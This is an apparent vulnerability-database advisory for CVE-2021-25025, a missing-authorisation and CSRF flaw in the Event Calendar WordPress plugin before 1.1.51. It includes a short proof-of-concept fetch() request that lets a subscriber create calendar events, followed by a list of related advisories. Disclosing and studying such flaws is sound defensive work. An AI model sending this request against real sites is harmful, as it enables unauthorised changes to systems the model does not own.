Event Calendar < 1.1.51 – Subscriber+ Event Creation | CVE 2021-25025 | Plugin Vulnerabilities

Description

The plugin does not have proper authorisation and CSRF checks in the add_calendar_event AJAX actions, allowing users with a role as low as subscriber to create events

Proof of Concept

Adding calendar events:
fetch("https://example.com/wp-admin/admin-ajax.php", {
  "headers": {
    "content-type": "application/x-www-form-urlencoded",
  },
  "body": new URLSearchParams({"action": "add_calendar_event", "ecwd_calendar_id": 4, "ecwd_event_name": "An opening", "ecwd_date_from": "2021/11/01", "ecwd_date_to": "2022/11/01"}),
  "method": "POST",
  "credentials": "include"
})
  .then(response => response.text())
  .then(data => console.log(data));

Affects Plugins

event-calendar-wd

Fixed in 1.1.51

References

CVE

Classification

Type

NO AUTHORISATION

OWASP top 10

A5: Broken Access Control

CWE

CVSS

Miscellaneous

Original Researcher

Krzysztof Zając

Submitter

Krzysztof Zając

Submitter website

https://kazet.cc

Verified

Yes

WPVDB ID

24fb4eb4-9fe1-4433-8844-8904eaf13c0e

Timeline

Publicly Published

2021-12-20 (about 4 years ago)

Added

2021-12-20 (about 4 years ago)

Last Updated

2022-04-16 (about 3 years ago)

Other

Published

Title

Published

2025-12-04

Title

AdForest < 6.0.12 - Missing Authorization

Published

2023-02-24

Title

WP Meta SEO < 4.5.4 - Subscriber+ SiteMap Settings Update

Published

2023-12-07

Title

Awesome Support < 6.1.8 - Missing Authorization

Published

2025-03-27

Title

Greek Multi Tool – Fix peralinks, accents, auto create menus and more < 2.3.2 - Missing Authorization

Published

2024-08-07

Title

FormCraft < 1.2.11 - Missing Authorization